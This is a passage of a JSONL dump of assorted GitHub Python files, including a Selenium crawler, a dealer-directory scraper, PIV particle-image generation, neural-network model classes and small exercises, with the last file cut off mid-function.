self._get_current_thread_ident()))\n\n def _get_current_thread_ident(self):\n return (os.getpid(), threading.current_thread().name)\n","repo_name":"douban/python-libmemcached","sub_path":"cmemcached.py","file_name":"cmemcached.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"52"} +{"seq_id":"8406579376","text":"import time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n\ncaps = DesiredCapabilities().CHROME\ncaps[\"pageLoadStrategy\"] = \"eager\" # interactive\ndriver = webdriver.Chrome(executable_path=\"./chromedriver\",desired_capabilities=caps)\ndriver.minimize_window()\nurl = \"https://www.wikipedia.org\"\nvisited = set() # visited hash_set\n\n\ndef find_all_outgoing_links(v):\n driver.get(v)\n html = driver.page_source\n soup = BeautifulSoup(html,'html.parser')\n links = soup.find_all('a')\n outgoingLinks = [a['href'] for a in links]\n return outgoingLinks\n\n\n\ndef crawl(url):\n Q = []\n titles = []\n links = []\n Q.append(url)\n visited.add(url)\n while len(Q) > 0:\n v = Q.pop(0)\n print(v)\n driver.get(v)\n titles.append(driver.title)\n links.append(v)\n print(driver.title,v,sep=\" ------- \",end=\"\\n\")\n newLinks = find_all_outgoing_links(v)\n for link in newLinks:\n if link not in visited:\n Q.append(link)\n visited.add(link)\n driver.close()\n return titles,links\n\ncrawl(url)","repo_name":"captainCommit/crawler","sub_path":"crawler_v2.py","file_name":"crawler_v2.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"45901367646","text":"import re\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ncorpus = [\"hello world\", \"hello beautiful\", \"hello world traveler hello\"]\n\ncv = CountVectorizer()\n\n# document term matrix \ndtm = cv.fit_transform(corpus)\n\n# Sum along the columns to find the most frequent words\ncounts = dtm.sum(axis=0)\n\ntf = TfidfVectorizer()\n\n# document term matrix \ndtm = cv.fit_transform(corpus)\n\n# Apply a regular expression to find a special row.\n# If you don't find anything, then make your regular expression less specific\nfor i, doc in enumerate(corpus):\n if re.search(\"world traveler\", doc):\n break\n\nrow = dtm[i, :]\n\nterms = cv.get_feature_names()\n\n_, col = row.nonzero()\n\n# These terms should match up\nprint(\"Original document: \", doc)\nprint(\"\"\"\n\nWords in matrix:\n----------------\"\"\")\nfor i in col:\n print(terms[i])\n\n\n# Find the most frequent wording s\nmostfreq = counts.argsort()\nmostfreq = np.squeeze(np.array(mostfreq))\nfor i in mostfreq[::-1]:\n print(terms[i])\n","repo_name":"clarkfitzg/stat129-spring23","sub_path":"tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2082018165","text":"\"\"\"Particle image generator\n\"\"\"\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport cv2\nimport torch \nfrom flows import lamb_oseen, sin_flow\n\n\nclass AttrDict(dict):\n __setattr__ = dict.__setitem__\n __getattr__ = dict.__getitem__\n\n\ndef erf(x):\n \"\"\"\n It's hard to believe we have to wrapper the erf function from pytorch\n \"\"\"\n x = torch.tensor(x)\n y = torch.erf(x).cpu().numpy()\n return y\n\n\ndef add_particle2(img_sz, particle):\n \"\"\"\n Using the erf function to synthesis the particle images\n \"\"\"\n image = np.zeros(img_sz)\n u, v = np.meshgrid(np.arange(img_sz[1]),np.arange(img_sz[0]))\n \n x_s = np.reshape(particle.x, (-1,1))\n y_s = np.reshape(particle.y, (-1,1))\n dp_s = np.reshape(particle.d, (-1,1))\n intensity_s = np.reshape(particle.i, (-1,1))\n dp_nominal=particle.nd\n\n for x, y, dp, intensity in zip(x_s, y_s, dp_s, intensity_s):\n ind_x1 = np.int(min(max(0, x-3*dp-2), img_sz[1]-6*dp-3))\n ind_y1 = np.int(min(max(0, y-3*dp-2), img_sz[0]-6*dp-3))\n ind_x2 = ind_x1 + np.int(6*dp+3)\n ind_y2 = ind_y1 + np.int(6*dp+3)\n \n lx = u[ind_y1:ind_y2, ind_x1:ind_x2] -x\n ly = v[ind_y1:ind_y2, ind_x1:ind_x2] -y\n b = dp/np.sqrt(8) # from the Gaussian intensity profile assumption\n\n img =(erf((lx+0.5)/b)-erf((lx-0.5)/b))*(erf((ly+0.5)/b)-erf((ly-0.5)/b))\n img = img*intensity \n \n image[ind_y1:ind_y2, ind_x1:ind_x2] = image[ind_y1:ind_y2, ind_x1:ind_x2]+ img\n \n b_n = dp_nominal/np.sqrt(8)\n partition = 1.5*(erf(0.5/b_n)-erf(-0.5/b_n))**2\n image = np.clip(image/partition,0,1.0) \n image = image*255.0\n image = np.round(image)\n return image\n\ndef gen_image_pair(config):\n # settings \n img_sz = (config.img_sz[0]+50,config.img_sz[1]+50) # add boundary \n ppp = config.ppp\n dp, d_std = config.dp, config.d_std\n i_std = config.i_std\n miss_ratio = config.miss_ratio\n\n # generate particles' parameters\n p1, p2= AttrDict(), AttrDict()\n p1.num = p2.num = np.round(ppp*np.prod(img_sz)).astype(np.int)\n p1.nd = p2.nd = dp\n p1.x = p2.x = np.random.uniform(0, img_sz[1], p1.num)\n p1.y = p2.y = np.random.uniform(0, img_sz[0], p1.num)\n p1.d = p2.d = np.abs(np.random.randn(p1.num)*d_std+ dp)\n p1.i = p2.i = np.random.randn(p1.num)*i_std+ 0.85\n\n # generate the flow field\n gx, gy = np.meshgrid(np.arange(img_sz[1]),np.arange(img_sz[0]))\n if config.style=='sin_flow':\n _, _, p1.x, p1.y, p2.x, p2.y = sin_flow(p1.x, p2.y, scale=config.scale)\n u, v, _, _, _, _ = sin_flow(gx, gy, scale=config.scale)\n elif config.style== 'lamb_oseen':\n _, _, x1, y1, x2, y2 = lamb_oseen(p1.x-img_sz[1]/2, p2.y-img_sz[0]/2, Gamma=config.gamma)\n p1.x, p1.y = x1+img_sz[1]/2, y1+img_sz[0]/2\n p2.x, p2.y = x2+img_sz[1]/2, y2+img_sz[0]/2\n u, v, _, _, _, _= lamb_oseen(gx-img_sz[1]/2, gy-img_sz[0]/2, Gamma=config.gamma)\n \n # generate images\n img1 = add_particle2(img_sz,p1)\n img2 = add_particle2(img_sz,p2)\n # img1 = add_particle(img_sz,p1)\n # img2 = add_particle(img_sz,p2)\n\n img1=img1[25:-25,25:-25]\n img2=img2[25:-25,25:-25]\n u=u[25:-25,25:-25]\n v=v[25:-25,25:-25]\n return img1, img2, u, v\n\ndef main():\n styles = ['lamb_oseen', 'sin_flow']\n # styles = ['lamb_oseen']\n gammas = [1e3, 2e3, 3e3]\n scale = [2.5, 5.0, 7.5]\n\n config = AttrDict\n config.img_sz = (256,256)\n config.ppp = 0.06\n config.dp = 2.5\n config.d_std = 0.1\n config.i_std =0.1\n config.miss_ratio = 0.1\n config.style='lamb_oseen'\n config.gamma = 5e3\n config.scale = 10\n\n for style in styles:\n config.style = style\n for i in range(3):\n if style == 'sin_flow':\n config.scale = scale[i]\n info = f\"sin_{scale[i]}\"\n elif style == 'lamb_oseen':\n config.gamma = gammas[i]\n info = f\"oseen_{gammas[i]}\"\n\n img1, img2, u, v = gen_image_pair(config)\n cv2.imwrite(info+'img1.png', img1)\n cv2.imwrite(info+'img2.png', img2)\n np.savez(info+'.npz', img1=img1, img2=img2, u=u, v=v)\n\n plt.figure()\n plt.imshow(img1)\n plt.figure()\n plt.imshow(img2)\n\n plt.show()\n\nif __name__=='__main__':\n main()\t\n\n","repo_name":"yongleex/DiffeomorphicPIV","sub_path":"PIG/PIG.py","file_name":"PIG.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"19430360865","text":"import random\r\nimport tkinter\r\nimport os\r\nfrom tkinter import *\r\nimport tkinter.font as font\r\nfrom tkinter import messagebox \r\nimport numpy as np\r\nimport pandas as pd\r\n#import seaborn as sns\r\n#import matplotlib.pyplot as plt\r\nimport os, random\r\n# loading Python Imaging Library\r\nfrom PIL import ImageTk, Image\r\n# To get the dialog box to open when required \r\nfrom tkinter import filedialog\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom tensorflow import keras\r\nresult = -1\r\nglobal x\r\n\r\ndef fun_predict():\r\n global Result_l\r\n img_width, img_height = 150, 150\r\n img = image.load_img(x, target_size = (img_width, img_height))\r\n img = image.img_to_array(img)\r\n img = np.expand_dims(img, axis = 0)\r\n\r\n result = model.predict(img)\r\n if result == 1 :\r\n result = \"Result : Pneumonia\"\r\n elif result == 0 :\r\n result = \"Result : Normal\"\r\n else:\r\n result = \"Result : Unpredicted\"\r\n myFont = font.Font(size=10)\r\n win.update()\r\n Result_l['text'] = result\r\n Result_l['font']=myFont\r\n Result_l.place(x=560,y=400)\r\n win.mainloop()\r\n\r\ndef open_img():\r\n global x, Result_l\r\n # Select the Imagename from a folder \r\n x = openfilename()\r\n Result_l['text'] = \" \"\r\n # opens the image\r\n img = Image.open(x)\r\n \r\n # resize the image and apply a high-quality down sampling filter\r\n img = img.resize((250, 250), Image.ANTIALIAS)\r\n \r\n # PhotoImage class is used to add image to widgets, icons etc\r\n img = ImageTk.PhotoImage(img)\r\n \r\n # create a label\r\n panel = Label(win, image = img)\r\n \r\n # set the image as img \r\n panel.image = img\r\n panel.place(x=460,y=100)\r\n\r\ndef openfilename():\r\n \r\n # open file dialog box to select image\r\n # The dialogue box has a title \"Open\"\r\n filename = filedialog.askopenfilename(title ='\"pen')\r\n return filename\r\n\r\nwin = Tk()\r\nwin.geometry(\"1200x1200\")\r\nwin.configure(bg='black')\r\nwin.title(\"ML\")\r\nmyFont = font.Font(size=20)\r\nResult_l = Label(win, text=\" \")\r\n\r\nmodel = keras.models.load_model(\"my_model1\")\r\n\r\nbtn = Button(win, text ='open image', command = lambda:open_img())\r\nbtn['font']=myFont\r\nbtn.place(x=450,y=440)\r\n\r\npre_b = Button(win, text ='predict', command = lambda:fun_predict())\r\npre_b['font']=myFont\r\npre_b.place(x=650,y=440)\r\n\r\nwin.mainloop()","repo_name":"Bhavesh-Parmar/Pneumonia_Detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72762928806","text":"import sys\n\nsys.path.append(\"./python\")\nimport needle as ndl\nimport needle.nn as nn\nimport math\nimport numpy as np\n\nnp.random.seed(0)\n\n\nclass ConvBN(ndl.nn.Module):\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n kernel_size: int,\n stride: int = 1,\n device=None,\n dtype=\"float32\",\n ):\n super().__init__()\n configs = {\n \"device\": device,\n \"dtype\": dtype,\n }\n self.conv2d = nn.Conv(\n in_channels,\n out_channels,\n kernel_size,\n stride,\n bias=True,\n **configs,\n )\n self.bn = nn.BatchNorm2d(out_channels, **configs)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.relu(self.bn(self.conv2d(x)))\n\n\nclass ResNet9(ndl.nn.Module):\n def __init__(self, device=None, dtype=\"float32\"):\n super().__init__()\n ### BEGIN YOUR SOLUTION ###\n configs = {\n \"device\": device,\n \"dtype\": dtype,\n }\n self.network = nn.Sequential(\n ConvBN(3, 16, 7, 4, **configs),\n ConvBN(16, 32, 3, 2, **configs),\n nn.Residual(\n nn.Sequential(\n ConvBN(32, 32, 3, 1, **configs),\n ConvBN(32, 32, 3, 1, **configs),\n )\n ),\n ConvBN(32, 64, 3, 2, **configs),\n ConvBN(64, 128, 3, 2, **configs),\n nn.Residual(\n nn.Sequential(\n ConvBN(128, 128, 3, 1, **configs),\n ConvBN(128, 128, 3, 1, **configs),\n )\n ),\n nn.Flatten(),\n nn.Linear(128, 128, bias=True, **configs),\n nn.ReLU(),\n nn.Linear(128, 10, bias=True, **configs),\n )\n ### END YOUR SOLUTION\n\n def forward(self, x):\n ### BEGIN YOUR SOLUTION\n return self.network(x)\n ### END YOUR SOLUTION\n\n\nclass LanguageModel(nn.Module):\n def __init__(\n self,\n embedding_size,\n output_size,\n hidden_size,\n num_layers=1,\n seq_model=\"rnn\",\n device=None,\n dtype=\"float32\",\n ):\n \"\"\"\n Consists of an embedding layer, a sequence model (either RNN or LSTM), and a\n linear layer.\n Parameters:\n output_size: Size of dictionary\n embedding_size: Size of embeddings\n hidden_size: The number of features in the hidden state of LSTM or RNN\n seq_model: 'rnn' or 'lstm', whether to use RNN or LSTM\n num_layers: Number of layers in RNN or LSTM\n \"\"\"\n super(LanguageModel, self).__init__()\n ### BEGIN YOUR SOLUTION\n configs = {\n \"device\": device,\n \"dtype\": dtype,\n }\n self.emb = nn.Embedding(output_size, embedding_size, **configs)\n if seq_model == \"rnn\":\n self.seq_model = nn.RNN(embedding_size, hidden_size, num_layers, **configs)\n elif seq_model == \"lstm\":\n self.seq_model = nn.LSTM(embedding_size, hidden_size, num_layers, **configs)\n\n self.linear = nn.Linear(hidden_size, output_size, **configs)\n ### END YOUR SOLUTION\n\n def forward(self, x, h=None):\n \"\"\"\n Given sequence (and the previous hidden state if given), returns probabilities of next word\n (along with the last hidden state from the sequence model).\n Inputs:\n x of shape (seq_len, bs)\n h of shape (num_layers, bs, hidden_size) if using RNN,\n else h is tuple of (h0, c0), each of shape (num_layers, bs, hidden_size)\n Returns (out, h)\n out of shape (seq_len*bs, output_size)\n h of shape (num_layers, bs, hidden_size) if using RNN,\n else h is tuple of (h0, c0), each of shape (num_layers, bs, hidden_size)\n \"\"\"\n ### BEGIN YOUR SOLUTION\n seq_len, bs = x.shape\n emb = self.emb(x) # (seq_len, bs, embedding_size)\n output, h_t = self.seq_model(emb, h) # output: (seq_len, bs, hidden_size)\n output = self.linear(\n output.reshape((seq_len * bs, -1))\n ) # output: (seq_len, bs, hidden_size)\n\n return output, h_t\n ### END YOUR SOLUTION\n\n\nif __name__ == \"__main__\":\n model = ResNet9()\n x = ndl.ops.randu((1, 32, 32, 3), requires_grad=True)\n model(x)\n cifar10_train_dataset = ndl.data.CIFAR10Dataset(\n \"data/cifar-10-batches-py\", train=True\n )\n train_loader = ndl.data.DataLoader(\n cifar10_train_dataset, 128, ndl.cpu(), dtype=\"float32\"\n )\n print(dataset[1][0].shape)\n","repo_name":"MartinLwx/10-414-Fall-2022-CMU","sub_path":"Hws/hw4/apps/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43864618189","text":"'''\nN = int(input())\nplans = input().split()\nx, y = 1, 1\nmove_types = ['L', 'R', 'U', 'D']\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\nfor plan in plans:\n for i in range(len(move_types)):\n if plan == move_types[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n if nx < 1 or ny < 1 or nx > N or ny > N:\n continue\n\n x, y = nx, ny\nprint(x, y)\n'''\n\nN = int(input())\nplans = input().split()\nx, y = 1, 1\nnx, ny = 0, 0\n\nfor plan in plans:\n nx = x\n ny = y\n if plan == 'L':\n ny = y - 1\n elif plan == 'R':\n ny = y + 1\n elif plan == 'U':\n nx = x - 1\n else:\n nx = x + 1\n if nx < 1 or ny < 1 or nx > N or ny > N:\n continue\n x = nx\n y = ny\n\nprint(x, y)\n","repo_name":"jhu97/coding-test","sub_path":"implementation_1.py","file_name":"implementation_1.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8639579107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 5 17:43:24 2017\nbeispiel https://youtu.be/F1ODsSWi9nk?list=PLNmsVeXQZj7q0ao69AIogD94oBgp3E9Zs\n@author: mom\n\"\"\"\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nform = logging.Formatter('%(name)s # %(levelname)s : %(asctime)s\\n\\t %(message)s')\nfileH = logging.FileHandler('log.me', mode = 'w')\nfileH.setFormatter(form)\nlogger = logging.getLogger()\n \nlogger.addHandler(fileH) \n \n\nlogger.debug('test Debug') \n#logging.debug('debug')\n#logging.warning('warning')\n#logging.info('info')\n#logging.error('error')\n#logging.critical('critical')\n\n\n\n\n\n\n\ndef testFunktion():\n logger = logging.getLogger(\"testFunktion\")\n logger.setLevel(logging.DEBUG)\n logger.debug('run testFunktion')\n\n\n\ntestFunktion()","repo_name":"syurskyi/Python_Topics","sub_path":"090_logging/examples/github/_logging-master/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3072296016","text":"def show_statistics_of_clusters(clusters):\n cluster_with_size_1 = 0\n cluster_with_size_2 = 0\n cluster_about_computing = 0\n big_clusters_about_computing = 0\n number_of_clusters = len(clusters)\n number_of_tweets = 0\n number_of_tweets_about_computing = 0\n number_of_processed_clusters = 0\n\n for cluster in clusters:\n number_of_tweets += len(cluster.tweets)\n try:\n if cluster.processed:\n number_of_processed_clusters += 1\n except AttributeError:\n pass\n if len(cluster.tweets) is 1:\n cluster_with_size_1 += 1\n if len(cluster.tweets) is 2:\n cluster_with_size_2 += 1\n if cluster.topic == \"computing\":\n cluster_about_computing += 1\n number_of_tweets_about_computing += len(cluster.tweets)\n if len(cluster.tweets) > 2:\n big_clusters_about_computing += 1\n\n for cluster in clusters:\n if cluster.topic == \"computing\":\n cluster.describe()\n\n print(\"Number of cluster with only one tweet \" + str(cluster_with_size_1))\n print(\"Number of cluster with only two tweets \" + str(cluster_with_size_2))\n print(\"Clusters about computing : \" + str(cluster_about_computing) +\n \" (\" + str(number_of_tweets_about_computing) + \")\")\n print(\"Among which \" + str(cluster_about_computing) + \" of clusters with more than 3 tweets\")\n print(\"Number of clusters \" + str(number_of_clusters) + \" (\" + str(number_of_tweets) + \")\")\n print(\"Number of processed cluster \" + str(number_of_processed_clusters))\n\n\ndef show_statistics_on_topic(clusters, topic):\n true_positive = 0\n true_negative = 0\n false_positive = 0\n false_negative = 0\n for cluster in clusters:\n if cluster.detected_topic == topic:\n if cluster.topic == topic:\n true_positive += 1\n else:\n false_positive += 1\n else:\n if cluster.topic == topic:\n false_negative += 1\n else:\n true_negative += 1\n print(\"There are \" + str(true_positive) + \" true positives.\")\n print(\"There are \" + str(true_negative) + \" true negatives.\")\n print(\"There are \" + str(false_positive) + \" false positives.\")\n print(\"There are \" + str(false_negative) + \" false negatives.\")\n","repo_name":"clement-escolano/Twicrawl","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30036449916","text":"\"\"\"\n\nAGVS Dealer information Scrapper\n\n\"\"\"\n# import required libraries\n\nfrom datetime import datetime\nimport concurrent.futures\nfrom collections import Counter\nimport math\nimport pandas as pd\nimport re\n\nfrom bs4 import BeautifulSoup\n\n# local imports\nfrom common import get_connection, escape_name, beautify, call_scraper_api, end_display, start_display\n\n# declare constants\nURL = f\"https://www.agvs-upsa.ch/de/verband/mitgliederverzeichnis/liste?distance&page=\"\nAPP_NAME = \"AVGS Dealer Scraper\"\nTABLE_NAME = \"agvs_dealers\"\ncounter = 0\nSPACE = 39\n# div details\ndiv_dict = {\n \"title\": \"views-field-title\",\n \"name\": \"views-field-field-name\",\n \"bezeichnung\": \"views-field-field-bezeichnung\",\n \"bezeichnung-2\": \"views-field-field-name2\",\n \"strasse\": \"views-field-field-strasse\",\n \"plz\": \"views-field-field-plz\",\n \"ortschaft\": \"views-field-field-ortschaft\",\n \"postfach\": \"views-field-field-postfach\",\n \"telefon\": \"views-field-field-telefon\",\n \"fax\": \"views-field-field-fax\",\n \"email\": \"views-field-field-address-email\",\n \"webseite\": \"views-field-field-url\",\n \"sektion\": \"views-field-field-sektion\",\n \"kanton\": \"views-field-field-kanton\",\n \"aec-zertifiziert\": \"views-field-field-aecgaragist\"\n }\ndealers = []\n\n\ndef insert_into_agvs_dealers(values):\n \"\"\"\n Inserts a value into table\n :param values:\n :return:\n \"\"\"\n connection = get_connection()\n cursor = connection.cursor(buffered = True)\n names = list(values[0])\n cols = \", \".join(map(escape_name, names))\n placeholders = \", \".join(['%({})s'.format(name) for name in names])\n query = 'INSERT INTO {} ({}) VALUES ({}) on duplicate key update webseite = VALUES(webseite), removed_at = NULL' \\\n .format('agvs_dealers', cols, placeholders)\n cursor.executemany(query, values)\n connection.commit()\n cursor.close()\n connection.close()\n \n \ndef get_existing_agvs_dealer_list():\n connection = get_connection()\n try:\n cursor = connection.cursor(buffered = True)\n query = 'SELECT title FROM agvs_dealers'\n cursor.execute(query)\n result = cursor.fetchall()\n cursor.close()\n connection.close()\n return result\n except Exception as e:\n beautify(SPACE, \"Error\", \": \" + str(e))\n\n\ndef scrapper(url):\n \"\"\"\n function to import all dealers from AVGS\n \n :param url: url\n :return: nothing\n \"\"\"\n global counter\n counter = counter + 1\n print(\"Counter - \", counter, \" \", url)\n response = call_scraper_api(url)\n # check if data fetched successfully\n if response.status_code == 200:\n # read contents\n soup = BeautifulSoup(response.content, \"html.parser\")\n \n # copy required details\n all_content_div = soup.find_all(\"div\", attrs = {\"class\": \"view-content\"})\n for mainDiv in all_content_div:\n all_dealer_div = mainDiv.find_all(\"div\", attrs = {\"class\": \"views-row\"})\n for div in all_dealer_div:\n value_dict = {}\n # find all fields\n for title in div_dict:\n field_div = div.find(\"div\", attrs = {\"class\": div_dict[title]})\n value_dict[title] = field_div.find(class_ = \"field-content\").text if field_div else None\n # check if page has information\n if not value_dict[\"title\"]:\n break\n else:\n # save results to table \"AGVS\"\n dealers.append(value_dict)\n\n\ndef main():\n \"\"\"\n \n :return:\n \"\"\"\n start_time = datetime.now()\n # Application start display\n start_display(APP_NAME, start_time)\n \n # Scrapping Dealers\n beautify(SPACE, \"Stage\", \": Getting Pages\\n\")\n \n url = URL + str(0)\n response = call_scraper_api(url)\n soup = BeautifulSoup(response.content, \"html.parser\")\n page_count = soup.find(\"div\", attrs = {\"class\": \"view-footer\"}).getText()\n pages = re.search(\".* ([0-9]+)\", page_count).group(1)\n pages = math.ceil(float(pages)/40)\n\n beautify(SPACE, \"Number of pages\", \": \"+str(pages)+\"\\n\")\n \n list_of_urls = []\n for i in range(int(pages)):\n url = URL + str(i)\n list_of_urls.append(url)\n existing_dealers = get_existing_agvs_dealer_list()\n\n beautify(SPACE, \"Stage\", \": Scrapping Dealers\\n\")\n \n with concurrent.futures.ThreadPoolExecutor(max_workers = 20) as executor:\n executor.map(scrapper, list_of_urls)\n\n beautify(SPACE, \"Stage\", \": Data transfer to mysql \\n\")\n beautify(SPACE, \"Inserting data to mysql\", \": \" + str(len(dealers)))\n insert_into_agvs_dealers(dealers)\n \n beautify(SPACE, \"Status\", \": Completed Successfully\")\n beautify(SPACE, \"Pages Scrapped\", f\": {counter}\")\n\n try:\n beautify(SPACE, \"\\nStage\", \": Checking records to delete\")\n \n new_dealers = []\n for dealer in dealers:\n new_dealers.append(str(dealer.get('title')))\n \n existing_dealers_list = pd.DataFrame(existing_dealers, columns = ['title'])['title'].tolist()\n removed_dealer_list = list((Counter(existing_dealers_list) - Counter(new_dealers)).elements())\n beautify(SPACE, \"existing_dealers_list in mysql\", \": \" + str(len(existing_dealers_list)))\n beautify(SPACE, \"Updating removed_dealer_list in mysql\", \": \" + str(len(removed_dealer_list)))\n \n to_delete = []\n for i in range(0, len(removed_dealer_list)):\n data = {\"title\": removed_dealer_list[i]}\n to_delete.append(data)\n \n if len(to_delete) > 0:\n connection = get_connection()\n cursor = connection.cursor(buffered = True)\n names = list(to_delete[0])\n cols = \", \".join(map(escape_name, names))\n placeholders = \", \".join(['%({})s'.format(name) for name in names])\n query = 'INSERT INTO {} ({}) VALUES ({}) on duplicate key update removed_at = CURRENT_TIMESTAMP' \\\n .format('agvs_dealers', cols, placeholders)\n cursor.executemany(query, to_delete)\n connection.commit()\n cursor.close()\n connection.close()\n \n except Exception as e:\n beautify(SPACE, \": \" + str(e))\n \n # Application end display\n end_display(start_time)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Coder9795/datascience","sub_path":"Basic Python/Data Mining (BeautifulSoup)/AGVS.py","file_name":"AGVS.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19588629620","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport resource\n\n\nclass VW(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self._type = None\n self.variables_widget = QtWidgets.QWidget()\n self.variables_widget.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n self.variables_widget.setGeometry(QtCore.QRect(210, 200, 301, 51))\n self.variables_widget.setMinimumSize(301, 51)\n self.variables_widget.setStyleSheet(\"QWidget {\\n\"\n \" border-radius: 10px;\\n\"\n \" border: 1px solid black;\\n\"\n \" background-image: url(:/stone/stonepap.png);\\n\"\n \"}\")\n self.variables_widget.setObjectName(\"variables_widget\")\n self.enter = QtWidgets.QLineEdit(self.variables_widget)\n self.enter.setGeometry(QtCore.QRect(230, 6, 51, 40))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(61)\n sizePolicy.setVerticalStretch(31)\n sizePolicy.setHeightForWidth(self.enter.sizePolicy().hasHeightForWidth())\n self.enter.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setFamily(\"Vin Slab Pro\")\n font.setPointSize(10)\n font.setBold(True)\n font.setWeight(75)\n self.enter.setFont(font)\n self.enter.setStyleSheet(\"QLineEdit {\\n\"\n \" color: rgb(255, 255, 255);\\n\"\n \" background-image: url(:/cloth/bgtex.png);\\n\"\n \"}\\n\"\n \"QLineEdit::hover {\\n\"\n \" background-image: url(:/cloth/bgtex1.png);\\n\"\n \"}\")\n self.enter.setAlignment(QtCore.Qt.AlignCenter)\n self.enter.setObjectName(\"enter\")\n self.name = QtWidgets.QLabel(self.variables_widget)\n self.name.setGeometry(QtCore.QRect(10, 20, 220, 30))\n font = QtGui.QFont()\n font.setFamily(\"Vin Slab Pro\")\n font.setPointSize(21)\n font.setBold(True)\n font.setWeight(75)\n self.name.setFont(font)\n self.name.setStyleSheet(\"QLabel {\\n\"\n \" background: None;\\n\"\n \" border: None;\\n\"\n \"}\")\n self.name.setObjectName(\"name\")\n self.qllabel = QtWidgets.QLabel(self.variables_widget)\n self.qllabel.setGeometry(QtCore.QRect(0, 0, 60, 20))\n font = QtGui.QFont()\n font.setFamily(\"Vin Slab Pro\")\n font.setPointSize(13)\n font.setBold(True)\n font.setWeight(75)\n self.qllabel.setFont(font)\n self.qllabel.setStyleSheet(\"QLabel {\\n\"\n \" background: None;\\n\"\n \" border: 1px solid black;\\n\"\n \" border-top-left-radius: 10px;\\n\"\n \" border-bottom-right-radius: 10px;\\n\"\n \" border-top-right-radius: 0;\\n\"\n \" border-bottom-left-radius: 0;\\n\"\n \"}\")\n self.qllabel.setAlignment(QtCore.Qt.AlignCenter)\n self.qllabel.setObjectName(\"qllabel\")","repo_name":"VerS7/python-hah-qlhelper","sub_path":"hahhelper/variableWidget.py","file_name":"variableWidget.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32080505423","text":"import numpy as np\nimport os\n\n#embedding the position \ndef pos_embed(x):\n\tif x < -60:\n\t\treturn 0\n\tif x >= -60 and x <= 60:\n\t\treturn x+61\n\tif x > 60:\n\t\treturn 122\n#find the index of x in y, if x not in y, return -1\ndef find_index(x,y):\n\tflag = -1\n\tfor i in range(len(y)):\n\t\tif x != y[i]:\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn i\n\treturn flag\n\n#reading data\ndef init():\n\t\n\tprint('reading word embedding data...')\n\tvec = []\n\tword2id = {}\n\tf = open('./origin_data/vec.txt')\n\tf.readline()\n\twhile True:\n\t\tcontent = f.readline()\n\t\tif content == '':\n\t\t\tbreak\n\t\tcontent = content.strip().split()\n\t\tword2id[content[0]] = len(word2id)\n\t\tcontent = content[1:]\n\t\tcontent = [(float)(i) for i in content]\n\t\tvec.append(content)\n\tf.close()\n\tword2id['UNK'] = len(word2id)\n\tword2id['BLANK'] = len(word2id)\n\t\n\tdim = 50\n\tvec.append(np.random.normal(size=dim,loc=0,scale=0.05))\n\tvec.append(np.random.normal(size=dim,loc=0,scale=0.05))\n\tvec = np.array(vec,dtype=np.float32)\n\n\t\n\tprint('reading relation to id')\n\trelation2id = {}\t\n\tf = open('./origin_data/relation2id.txt','r')\n\twhile True:\n\t\tcontent = f.readline()\n\t\tif content == '':\n\t\t\tbreak\n\t\tcontent = content.strip().split()\n\t\trelation2id[content[0]] = int(content[1])\n\tf.close()\n\n\t#length of sentence is 70\n\tfixlen = 70\n\t#max length of position embedding is 60 (-60~+60)\n\tmaxlen = 60\n\n\ttrain_sen = {} #{entity pair:[[[label1-sentence 1],[label1-sentence 2]...],[[label2-sentence 1],[label2-sentence 2]...]}\n\ttrain_ans = {} #{entity pair:[label1,label2,...]} the label is one-hot vector\n\n\n\tprint('reading train data...')\n\tf = open('./origin_data/train.txt','r')\n\n\twhile True:\n\t\tcontent = f.readline()\n\t\tif content == 